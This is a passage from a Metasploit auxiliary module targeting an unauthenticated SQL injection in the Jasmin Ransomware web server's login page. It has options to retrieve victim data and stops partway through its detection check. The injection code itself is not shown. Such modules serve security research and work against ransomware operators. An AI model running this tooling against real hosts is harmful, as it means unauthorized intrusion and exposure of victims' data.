## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Exploit::SQLi def initialize(info = {}) super( update_info( info, 'Name' => 'Jasmin Ransomware Web Server Unauthenticated SQL Injection', 'Description' => %q{ The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability within the login functionality. As of April 15, 2024 this was still unpatched, so all versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched. Retrieving the victim's data may take a long amount of time. It is much quicker to get the logins, then just login to the site. }, 'References' => [ ['CVE', '2025-6095'], ['URL', 'https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc'], ['URL', 'https://github.com/codesiddhant/Jasmin-Ransomware'] ], 'Author' => [ 'chebuya', # discovery, PoC 'h00die', # metasploit module ], 'License' => MSF_LICENSE, 'DisclosureDate' => '2023-04-08', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [], 'SideEffects' => [] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The relative URI of the Jasmin Ransomware webserver', '/']), OptBool.new('VICTIMS', [false, 'Retrieve data on the victims', false]), OptInt.new('VICTIMLIMIT', [false, 'Number of victims data to pull']), ] ) end def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path) ) return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 return Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '